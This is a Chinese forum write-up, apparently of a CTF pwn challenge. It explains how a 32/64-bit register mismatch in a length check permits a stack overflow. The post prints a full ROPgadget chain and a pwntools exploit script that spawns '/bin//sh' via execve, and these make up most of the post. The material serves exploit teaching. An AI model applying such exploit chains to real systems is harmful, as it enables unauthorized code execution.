吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4977|回复: 6
收起左侧

[漏洞分析] 由寄存器位数差异引发的漏洞利用

[复制链接]
kabeo 发表于 2020-1-23 22:11
|63..32|31..16|15-8|7-0|
               |AH.|AL.|
               |AX.....|
       |EAX............|
|RAX...................|

以上是16,32,64位寄存器的大小。

安全检查

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA分析

image.png

可见有一处花指令,先nop掉看逻辑

image.png

image.png

要求输入小于等于10也就是0xA,否则程序退出。

查看汇编

image.png

可以发现

eax               0000 000a
rax     0000 0000 0000 000a
rax     0000 0001 0000 000a    构造成这样也可以通过

cmp指令的隐含操作为 op1-op2判断是否等于0。因此可触发类似整数溢出的漏洞。

于是如果我们构造 0x1 0000 0009 - 0xa 就会将eax内容变为 0xffff ffff,从而在后面的read name可以读大量字节,造成栈溢出。

使用file命令查看发现程序为静态链接

ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped

且程序内有syscall,因此直接使用ret2syscall进行ROP。

对于这道题来说,即可以手工构造给syscall传参,也可以使用 ROPgadget直接生成利用链

ROPgadget --binary intoverflow --ropchain

直接生成如下

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

    [+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret
    [+] Gadget found: 0x4017b7 pop rsi ; ret
    [+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret
    [+] Gadget found: 0x42660f xor rax, rax ; ret

- Step 2 -- Init syscall number gadgets

    [+] Gadget found: 0x42660f xor rax, rax ; ret
    [+] Gadget found: 0x46ea20 add rax, 1 ; ret
    [+] Gadget found: 0x46ea21 add eax, 1 ; ret

- Step 3 -- Init syscall arguments gadgets

    [+] Gadget found: 0x401696 pop rdi ; ret
    [+] Gadget found: 0x4017b7 pop rsi ; ret
    [+] Gadget found: 0x442e46 pop rdx ; ret

- Step 4 -- Syscall gadget

    [+] Gadget found: 0x4003da syscall

- Step 5 -- Build the ROP chain

    #!/usr/bin/env python2
    # execve generated by ROPgadget

    from struct import pack

    # Padding goes here
    p = ''

    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca080) # home.php?mod=space&uid=402414 .data
    p += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
    p += '/bin//sh'
    p += pack('<Q', 0x4141414141414141) # padding
    p += pack('<Q', 0x4141414141414141) # padding
    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x0000000000401696) # pop rdi ; ret
    p += pack('<Q', 0x00000000006ca080) # @ .data
    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x00000000004003da) # syscall

于是利用思路如下:

  1. 输入构造的数字使read参数极大
  2. 填充到retn位置
  3. 填充rop利用链

exp

from pwn import *
from struct import pack
p=process('./intoverflow')

payload='a'*88
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data
payload += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
payload += '/bin//sh'
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
payload += pack('<Q', 0x0000000000401696) # pop rdi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
payload += pack('<Q', 0x00000000004003da) # syscall

p.recvuntil('Plz Input Your weight(kg):\n> ')
p.sendline('4294967290')
p.recvuntil('Good! what\'s your name??\n> ')
p.sendline(payload)

p.interactive()

免费评分

参与人数 2威望 +2 吾爱币 +8 热心值 +2 收起 理由
Hmily + 2 + 7 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
huayugongju + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

JuncoJet 发表于 2020-1-24 01:25
lea 是传址
mov 是传值
JuncoJet 发表于 2020-1-24 01:27
简单的说你的变量定义的就是32位的,而指针是64位。
头像被屏蔽
庞晓晓 发表于 2020-1-24 08:42
eebill 发表于 2020-2-11 16:13
我去厉害了,我的歌
eebill 发表于 2020-2-11 16:18
有意思,太有趣了,厉害。。。
头像被屏蔽
poemrain 发表于 2020-2-12 11:32
提示: 作者被禁止或删除 内容自动屏蔽
旧街人字拖 发表于 2020-2-14 21:41
利害了。。。。。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 00:32

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表